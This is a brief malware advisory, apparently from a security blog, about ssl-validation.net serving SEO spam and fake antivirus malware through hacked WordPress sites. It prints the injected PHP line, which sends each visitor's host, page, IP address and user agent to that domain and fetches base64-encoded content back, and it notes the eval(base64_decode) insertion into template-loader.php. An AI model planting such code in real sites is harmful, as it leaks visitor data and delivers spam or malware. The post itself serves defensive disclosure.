Malware update – ssl-validation.net

Quick malware update: The site ssl-validation.net (nice name) is being used to distribute SEO spam and malware (Rhe famous fake AV, say it ain’t so).

You can get details of the code being used here: http://sucuri.net/?page=tools&title=blacklist&detail=7ea73e3ac775b52b945d5b45a5abb7ad

$outsourceurl="http://ssl-validation.net/gt.php?site=”.urlencode($_SERVER[‘HTTP_HOST’]).’&page=’.urlencode($_SERVER[‘REQUEST_URI’]).’&ip=’.urlencode($_SERVER[‘REMOTE_ADDR’]).’&agent=’.urlencode($_SERVER[‘HTTP_USER_AGENT’]);
$links = base64_decode(file_get_contents($outsourceurl));

Most of the time, it is inserting an eval(base64_decode inside the template-loader.php file from WordPress.

The malicious site is hosted at 95.211.108.146.

Suggestion for hosting companies: Block this IP.

2 comments

Comments are closed.

You May Also Like